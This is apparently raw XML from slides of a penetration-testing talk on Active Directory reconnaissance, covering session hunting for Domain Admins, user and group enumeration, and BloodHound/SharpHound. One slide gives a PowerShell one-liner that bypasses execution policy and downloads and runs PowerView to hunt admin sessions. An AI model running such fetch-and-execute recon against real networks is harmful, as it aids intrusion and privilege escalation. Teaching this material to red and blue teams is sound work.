            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223197" y="1580309"/>
            <a:ext cx="10816715" cy="1138773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Identify sessions of all users in the domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Specifically we are looking for Domain Admins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51CC901E-07D1-4582-983A-42053F417F81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223197" y="2958381"/>
            <a:ext cx="11588502" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>UserHunter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>('https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/master/Recon/PowerView.ps1'); Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>UserHunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>;“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D4B1594-09F5-4624-8062-11D958397EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="57387"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037036" y="4490343"/>
            <a:ext cx="9580658" cy="2367657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330228782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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="1482394"/>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Network Recon  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting the Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767724" y="1967498"/>
            <a:ext cx="9768091" cy="4431983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>List all users, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Internal password attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>List all groups, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Might not need DA to get to the loot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>List out Domain Computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217902344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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="785398"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D365E92-EC29-4AFF-802C-E3994231E392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625214" y="2213978"/>
            <a:ext cx="8941568" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run lots of manual commands or….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Bloodhound!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358183965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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bloodhound /</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE3F07A-BC97-47FD-9310-1E95C276B77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583567" y="1242630"/>
            <a:ext cx="10578516" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8126C44B-7B99-4727-A147-591B4C152F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310231" y="1605743"/>
            <a:ext cx="5412276" cy="4009627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A7F6AC1-C65E-4E4C-B397-1511D283E7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1537811" y="6001798"/>
            <a:ext cx="9624272" cy="488015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is developed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>@_wald0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CptJesus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>@harmj0y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + others!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22767285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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="1359828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F83E11-AF64-46A8-8A79-5243C87C7991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463826" y="1524000"/>
            <a:ext cx="11390244" cy="3679948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fantastic tools for both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> teams!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Quickly identify ‘control relations’ between objects in Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Highly complex attack paths visualized in graphs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193078136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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="1359828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
